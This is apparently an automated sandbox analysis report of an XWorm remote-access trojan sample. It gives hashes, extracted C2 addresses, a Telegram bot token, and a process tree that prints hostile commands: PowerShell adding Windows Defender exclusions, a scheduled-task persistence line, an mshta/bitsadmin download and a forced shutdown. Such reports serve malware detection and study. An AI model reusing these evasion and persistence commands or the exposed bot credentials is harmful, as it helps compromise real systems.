Analysis
-
max time kernel
93s -
max time network
94s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system -
submitted
31-05-2024 03:18
Static task
static1
Behavioral task
behavioral1
Sample
Output.exe
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
Output.exe
Resource
win10v2004-20240426-en
Errors
General
-
Target
Output.exe
-
Size
122KB
-
MD5
fd08b9ac311ff6eb9c24e79ebb829b0c
-
SHA1
e2a8a4a97f104cc6c9fcb43d2e15e05bf0c73ff3
-
SHA256
3c63c4ca4f2fe4c5541ecb267e8c98154dcd1ec3dada24efa8b50ec8d4542824
-
SHA512
55829d66ef2b92e96c693c6af08008602b19754ada2c9100d3f630de69742d99d4b87cf89518402c1a0c05b4da81129793dd489a6af4d0ae5df520f783432dab
-
SSDEEP
3072:mz8hmIvtEwHJp7eiH7o8cB5+LuLjB3/IMKilf55:LEUJpp0/cKLj9wMK
Malware Config
Extracted
xworm
127.0.0.1:40971
us3.localto.net:40971
Name1442-40971.portmap.host:40971
-
Install_directory
%Temp%
-
install_file
KVRT.exe
-
telegram
https://api.telegram.org/bot6916721041:AAGsGXyaplDWQ9HJlE88Z36KtBFClSB3E20
Signatures
-
Detect Xworm Payload 4 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\KVRT.exe family_xworm behavioral1/memory/2344-9-0x0000000000E20000-0x0000000000E3E000-memory.dmp family_xworm behavioral1/memory/2724-42-0x00000000003E0000-0x00000000003FE000-memory.dmp family_xworm behavioral1/memory/2784-46-0x0000000000100000-0x000000000011E000-memory.dmp family_xworm -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 2952 powershell.exe 2828 powershell.exe 2728 powershell.exe 1868 powershell.exe -
Downloads MZ/PE file
-
Drops startup file 2 IoCs
Processes:
KVRT.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KVRT.lnk KVRT.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KVRT.lnk KVRT.exe -
Executes dropped EXE 3 IoCs
Processes:
KVRT.exeKVRT.exeKVRT.exepid process 2344 KVRT.exe 2724 KVRT.exe 2784 KVRT.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
KVRT.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\KVRT = "C:\\Users\\Admin\\AppData\\Local\\Temp\\KVRT.exe" KVRT.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 8 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Download via BitsAdmin 1 TTPs 1 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
KVRT.exepid process 2344 KVRT.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeKVRT.exepid process 2952 powershell.exe 2828 powershell.exe 2728 powershell.exe 1868 powershell.exe 2344 KVRT.exe -
Suspicious use of AdjustPrivilegeToken 10 IoCs
Processes:
KVRT.exepowershell.exepowershell.exepowershell.exepowershell.exeKVRT.exeKVRT.exeshutdown.exedescription pid process Token: SeDebugPrivilege 2344 KVRT.exe Token: SeDebugPrivilege 2952 powershell.exe Token: SeDebugPrivilege 2828 powershell.exe Token: SeDebugPrivilege 2728 powershell.exe Token: SeDebugPrivilege 1868 powershell.exe Token: SeDebugPrivilege 2344 KVRT.exe Token: SeDebugPrivilege 2724 KVRT.exe Token: SeDebugPrivilege 2784 KVRT.exe Token: SeShutdownPrivilege 2768 shutdown.exe Token: SeRemoteShutdownPrivilege 2768 shutdown.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
KVRT.exepid process 2344 KVRT.exe -
Suspicious use of WriteProcessMemory 35 IoCs
Processes:
Output.exemshta.exeKVRT.exetaskeng.exedescription pid process target process PID 2192 wrote to memory of 2344 2192 Output.exe KVRT.exe PID 2192 wrote to memory of 2344 2192 Output.exe KVRT.exe PID 2192 wrote to memory of 2344 2192 Output.exe KVRT.exe PID 2192 wrote to memory of 2708 2192 Output.exe mshta.exe PID 2192 wrote to memory of 2708 2192 Output.exe mshta.exe PID 2192 wrote to memory of 2708 2192 Output.exe mshta.exe PID 2192 wrote to memory of 2708 2192 Output.exe mshta.exe PID 2708 wrote to memory of 2640 2708 mshta.exe bitsadmin.exe PID 2708 wrote to memory of 2640 2708 mshta.exe bitsadmin.exe PID 2708 wrote to memory of 2640 2708 mshta.exe bitsadmin.exe PID 2708 wrote to memory of 2640 2708 mshta.exe bitsadmin.exe PID 2344 wrote to memory of 2952 2344 KVRT.exe powershell.exe PID 2344 wrote to memory of 2952 2344 KVRT.exe powershell.exe PID 2344 wrote to memory of 2952 2344 KVRT.exe powershell.exe PID 2344 wrote to memory of 2828 2344 KVRT.exe powershell.exe PID 2344 wrote to memory of 2828 2344 KVRT.exe powershell.exe PID 2344 wrote to memory of 2828 2344 KVRT.exe powershell.exe PID 2344 wrote to memory of 2728 2344 KVRT.exe powershell.exe PID 2344 wrote to memory of 2728 2344 KVRT.exe powershell.exe PID 2344 wrote to memory of 2728 2344 KVRT.exe powershell.exe PID 2344 wrote to memory of 1868 2344 KVRT.exe powershell.exe PID 2344 wrote to memory of 1868 2344 KVRT.exe powershell.exe PID 2344 wrote to memory of 1868 2344 KVRT.exe powershell.exe PID 2344 wrote to memory of 2752 2344 KVRT.exe schtasks.exe PID 2344 wrote to memory of 2752 2344 KVRT.exe schtasks.exe PID 2344 wrote to memory of 2752 2344 KVRT.exe schtasks.exe PID 2272 wrote to memory of 2724 2272 taskeng.exe KVRT.exe PID 2272 wrote to memory of 2724 2272 taskeng.exe KVRT.exe PID 2272 wrote to memory of 2724 2272 taskeng.exe KVRT.exe PID 2272 wrote to memory of 2784 2272 taskeng.exe KVRT.exe PID 2272 wrote to memory of 2784 2272 taskeng.exe KVRT.exe PID 2272 wrote to memory of 2784 2272 taskeng.exe KVRT.exe PID 2344 wrote to memory of 2768 2344 KVRT.exe shutdown.exe PID 2344 wrote to memory of 2768 2344 KVRT.exe shutdown.exe PID 2344 wrote to memory of 2768 2344 KVRT.exe shutdown.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Output.exe"C:\Users\Admin\AppData\Local\Temp\Output.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2192 -
C:\Users\Admin\AppData\Roaming\KVRT.exe"C:\Users\Admin\AppData\Roaming\KVRT.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2344 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\KVRT.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2952
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'KVRT.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2828
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\KVRT.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2728
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'KVRT.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1868
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "KVRT" /tr "C:\Users\Admin\AppData\Local\Temp\KVRT.exe"3⤵
- Creates scheduled task(s)
PID:2752
-
-
C:\Windows\system32\shutdown.exeshutdown.exe /f /s /t 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2768
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"2⤵
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\SysWOW64\bitsadmin.exe"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://devbuilds.s.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exe C:\Users\Admin\AppData\Local\Temp\KVRT.exe3⤵
- Download via BitsAdmin
PID:2640
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {4CB9AD00-B271-4685-9B17-9A43F0BFED00} S-1-5-21-2721934792-624042501-2768869379-1000:BISMIZHX\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:2272 -
C:\Users\Admin\AppData\Local\Temp\KVRT.exeC:\Users\Admin\AppData\Local\Temp\KVRT.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2724
-
-
C:\Users\Admin\AppData\Local\Temp\KVRT.exeC:\Users\Admin\AppData\Local\Temp\KVRT.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2784
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x01⤵PID:2788
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x11⤵PID:2052
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
877B
MD526fde2dde716bf34ccd01dc4e14a1513
SHA1c0f9355285806e665cd8adb5f505e6dd1a829058
SHA2563f132ede178bfbe1e0271cf42f9209a9e51ef3be491d5cce9e4c8a82349b67f9
SHA51270667597d52e1b3d2db35c6d6f4fbb346d523c42f460ee4b1c34e4257ae66bc69e9a1369b0fbe9fe7d580491233ae94cb3507c098f9927cc90daf8d29eb3cd8c
-
Filesize
95KB
MD5caacc00a3a1be01e99f29abcf5f242c4
SHA12605c5337c15fda32deafe27d49baf34ab892561
SHA256209e122072c202f0e7663407dbfb6c99774360ee736fcaad8a6998adbb06224e
SHA5123ca0c64f573bb07b2b93ec2bbffe9684bbc6e764f0ab07d716d1d035897aaf0c6d71444e569deb28ef57067717b30f52b20eba5176c657fe0c69746778d852e1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4AKPAXVNRLS3K8YT3LWT.temp
Filesize7KB
MD5bc1a15d6099150439bc7abe4ebf51091
SHA1202b59aac99209fdbcf37777adca931a1d88b746
SHA25628d8447902a66787f5454124377b459d518f3108e88439ea34e6e33c45aabe43
SHA5129fd3f16bf233ee0eefbc6fc001083e34e2fd08f2012055ac23b6d0b5301313a92b65802f7b25eb7bc800255404ed9a8f2a86ea95b6d94082b6ba0945d8027f2a